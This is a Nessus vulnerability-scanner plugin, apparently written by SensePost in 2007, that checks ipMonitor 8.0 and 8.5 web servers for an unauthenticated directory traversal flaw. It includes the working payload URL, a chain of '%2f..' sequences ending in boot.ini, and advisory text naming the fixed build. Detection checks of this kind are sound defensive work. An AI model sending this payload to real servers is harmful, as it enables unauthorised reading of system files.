#
# written by Gareth Phillips - SensePost PTY ltd (www.sensepost.com)
#


desc["english"] = "
Synopsis :

The remote web server is affected by a directory traversal
vulnerability. 

Description :

A directory traversal flaw was discovered by SensePost to affect
ipMonitor versions 8.0 and 8.5.  Upon sending a specially formed
request to the web server, containing a series of '%2f..' sequences,
an unauthenticated attacker is able to traverse the web root and
obtain files within the remote file system. 

See also :

https://support.ipmonitor.com/releasehistory.aspx

Solution: 

Upgrade to ipMonitor 8.5, Build 1163 or later. 

Risk factor :

Medium / CVSS Base Score : 5.0
(CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N)";


if(description)
{
script_id(29697);
script_version ("$Revision: 1.1 $");

name["english"] = "ipMonitor Directory Traversal";
script_name(english:name["english"]);

script_description(english:desc["english"]);

summary["english"] = "ipMonitor Directory Traversal";
script_summary(english:summary["english"]);

script_category(ACT_GATHER_INFO);

script_copyright(english:"This script is Copyright (C) 2007 SensePost");

family["english"] = "Web Servers";
script_family(english:family["english"]);
script_dependencie("find_service1.nasl", "no404.nasl");
script_require_ports("Services/www", 80);
exit(0);
}

#
# The script code starts here
#
include("http_func.inc");
include("http_keepalive.inc");
port = get_http_port(default:80);

if(!get_port_state(port))exit(0);

banner = get_http_banner(port: port);
if(!banner)exit(0);

serv = strstr(banner, "Server:");
if(!serv)exit(0);
if(ereg(pattern:"^Server:.ipMonitor 8\.(0|5)", string:serv))
{
	exploit_url = "/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../boot.ini";
	req = http_get(item:exploit_url, port:port);
	r = http_keepalive_send_recv(port:port, data:req);
if ("[boot loader]" >< r)
{
  report = string(
    desc["english"],
    "\n\n",
    "Plugin output :\n",
    "\n",
    "Nessus was able to retrieve an arbitrary file using the URL :\n",
    "\n",
    "  ", exploit_url, "\n",
    "\n",
    "which produced the following response :\n",
    "\n",
    r
  );
  security_warning(port:port, data:report);
}
}
